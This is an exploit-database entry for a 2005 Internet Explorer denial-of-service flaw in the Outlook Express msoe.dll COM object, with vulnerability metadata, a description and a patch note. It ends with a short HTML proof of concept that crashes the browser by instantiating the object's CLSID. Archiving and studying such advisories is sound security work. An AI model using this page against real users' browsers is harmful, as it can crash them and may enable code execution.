Microsoft Internet Explorer COM Object Instantiation Vulnerability

vendor:

Internet Explorer

by:

nop

7.5

CVSS

HIGH

Denial-of-Service

400

CWE

Product Name: Internet Explorer

Affected Version From: Microsoft Internet Explorer 2000SP4

Affected Version To: Microsoft Internet Explorer XPSP2 CN

Patch Exists: Yes

Related CWE: N/A

CPE: a:microsoft:internet_explorer

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows

2005

Microsoft Internet Explorer COM Object Instantiation Vulnerability

Microsoft Internet Explorer is prone to a denial-of-service vulnerability. This issue occurs because the application fails to load a DLL library when instantiated as an ActiveX control. An attacker may exploit this issue to crash Internet Explorer, effectively denying service to legitimate users, and may cause arbitrary code to run within the context of the application.

Mitigation:

Ensure that all software is up to date and patched with the latest security updates.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/19530/info

Microsoft Internet Explorer is prone to a denial-of-service vulnerability. 

This issue occurs because the application fails to load a DLL library when instantiated as an ActiveX control.

An attacker may exploit this issue to crash Internet Explorer, effectively denying service to legitimate users, and may cause arbitrary code to run within the context of the application.

 <!--
 // Internet Explorer (msoe.dll) COM Object Instantiation Vulnerability
 // tested: 2000SP4/XPSP2 CN

 // http://www.xsec.org
 // nop (nop#xsec.org)

 // CLSID: {233A9694-667E-11d1-9DFB-006097D50408}
 // Info: Outlook Express Address Book
 // ProgID: OutlookExpress.AddressBook.1
 // InprocServer32: %ProgramFiles%\Outlook Express\msoe.dll

 --!>
 <html><body>
 <object classid="CLSID:{233A9694-667E-11d1-9DFB-006097D50408}" ></object>
 </body></html>